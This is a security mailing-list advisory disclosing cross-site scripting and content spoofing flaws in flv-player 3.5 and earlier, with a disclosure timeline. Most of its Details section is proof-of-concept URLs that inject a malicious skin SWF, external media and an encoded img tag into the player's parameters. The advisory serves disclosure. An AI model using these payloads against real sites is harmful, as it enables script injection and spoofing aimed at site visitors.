Hello list! These are Cross-Site Scripting and Content Spoofing vulnerabilities in flv-player. ------------------------- Affected products: ------------------------- Vulnerable are flv-player 3.5 and previous versions. ------------------------- Affected vendors: ------------------------- U-Studio http://flv-mp3.com ---------- Details: ---------- XSS (via Flash Injection) (WASC-08): http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=xss.swf In old versions of Flash player the attack will work with flash file xss.swf at any domain, in new versions - only at the same domain. Content Spoofing (Flash Injection) (WASC-12): http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=http://site2/1.swf Content Spoofing (Content Injection) (WASC-12): http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&pic=http://site2/1.jpg Content Spoofing (HTML Injection) (WASC-12): http://site/path/uflvplayer_500x375.swf?way=http://site&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E XSS (WASC-08): http://site/path/uflvplayer_500x375.swf?way=http://site&comment=+%3Cimg%20src=%27xss.swf%27%3E In old versions of Flash player the attack will work with flash file xss.swf at any domain, in new versions - only at the same domain. Also Strictly social XSS attack is possible. ------------ Timeline: ------------ 2013.08.03 - announced at my site. 2013.08.05 - informed developers. 2013.10.08 - disclosed at my site (http://websecurity.com.ua/6694/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua